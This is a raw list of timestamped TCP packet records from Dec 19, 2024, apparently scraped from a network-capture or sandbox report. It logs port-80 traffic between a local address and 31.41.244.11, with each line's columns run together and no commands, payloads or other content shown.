                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.165065050 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.165102005 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.166127920 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.166161060 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.166237116 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.166266918 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.168621063 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.168653965 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.168673992 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.168704987 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.170973063 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.171004057 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.171061993 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.171091080 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.173273087 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.173304081 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.173383951 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.173418045 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.175612926 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.175668001 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.175719976 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.175756931 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.177926064 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.177963018 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.178021908 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.178057909 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.180188894 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.180222034 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.180286884 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.180318117 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.182365894 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.182401896 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.182410002 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.182440042 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.184525013 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.184556961 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.184639931 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.184673071 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.186721087 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.186752081 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.186873913 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.186914921 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.188806057 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.188853025 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.188918114 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.188950062 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.190917969 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.190958977 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.191008091 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.191042900 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.193005085 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.193046093 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.193115950 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.193146944 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.195055008 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.195096970 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.195168018 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.195202112 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.197093010 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.197130919 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.197205067 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.197242022 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.199086905 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.199139118 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.199162006 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.199198961 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.201591015 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.201631069 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.201653004 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.201684952 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.203043938 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.203078985 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.203149080 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.203182936 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.205003977 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.205051899 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.205147982 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.205183029 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.206962109 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.206999063 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.207062960 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.207099915 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.208899975 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.208951950 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.209033012 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.209070921 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.210764885 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.210802078 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.210875988 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.210911989 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.212685108 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.212733030 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.212827921 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.212863922 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.214576006 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.214611053 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.214689016 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.214718103 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.216476917 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.216516972 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.216587067 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.216619015 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.218374968 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.218446016 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.218485117 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.218527079 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.220371962 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.220412016 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.220455885 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.220488071 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.222160101 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.222202063 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.222264051 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.222301960 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.224097967 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.224204063 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.224210024 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.224239111 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.225987911 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.226030111 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.226097107 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.226129055 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.227873087 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.227907896 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.227984905 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.228019953 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.229871035 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.229912996 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.229985952 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.230025053 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.231683016 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.231724024 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.231786966 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.231826067 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.233568907 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.233617067 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.233671904 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.233711004 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.235451937 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.235522032 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.235559940 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.235598087 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.237343073 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.237385988 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.237471104 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.237505913 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.239240885 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.239279032 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.239355087 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.239387989 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.241147995 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.241183996 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.241233110 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.241266012 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.243035078 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.243098974 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.243170023 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.243206978 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.244924068 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.244965076 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.245042086 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.245075941 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.246835947 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.246875048 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.246959925 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.246999979 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.248796940 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.248833895 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.248913050 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.248950005 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.250628948 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.250710964 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.250739098 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.250775099 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.252516985 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.252551079 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.252621889 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.252654076 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.254427910 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.254466057 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.254534006 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.254568100 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.256315947 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.256351948 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.256403923 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.256437063 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.258213997 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.258249998 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.258333921 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.258368969 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.260139942 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.260257959 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.260265112 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.260308027 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.262020111 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.262053013 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.262125015 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.262159109 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.263921976 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.263961077 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.356995106 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.357058048 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.357079983 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.357140064 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.358176947 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.358237982 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.358412027 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.358468056 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.359158039 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.359201908 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.359273911 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.359343052 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.360658884 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.360676050 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.360709906 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.360739946 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.362030029 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.362095118 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.362133980 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.362184048 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.363399029 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.363451004 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.363506079 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.363559008 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.364768982 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.364820004 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.364866018 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.364912033 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.366209984 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.366238117 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.366295099 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.367507935 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.367562056 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.367604971 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.367652893 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.368833065 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.368886948 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.368954897 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.369004011 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.370219946 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.370279074 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.370332003 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.370392084 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.371522903 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.371581078 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.371638060 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.371686935 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.372805119 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.372865915 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.372910976 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.372958899 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.374409914 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.374463081 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.374469042 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.374532938 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.375439882 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.375494957 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.375536919 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.375590086 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.376686096 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.376739979 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.376785040 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.376835108 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.377917051 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.377979994 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.378037930 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.378091097 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.379210949 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.379266977 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.379311085 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.379367113 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.380496979 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.380512953 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.380552053 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.380579948 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.381711960 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.381766081 CET4978780192.168.2.431.41.244.11
